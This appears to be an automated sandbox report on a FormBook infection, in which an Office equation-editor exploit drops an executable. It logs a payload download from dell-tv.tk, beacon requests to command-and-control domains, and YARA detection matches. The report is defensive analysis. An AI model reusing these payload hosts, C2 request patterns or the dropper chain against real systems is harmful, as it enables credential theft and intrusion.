html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:37 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:10:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcache-control: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b3c7df37c1c4230-AMSalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico95
          Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438482081.000000000844F000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.453053501.000000000844F000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoICROS~4.LNK
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp0
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpC
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: dell-tv.tk
          Source: global trafficHTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exeJump to dropped file
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
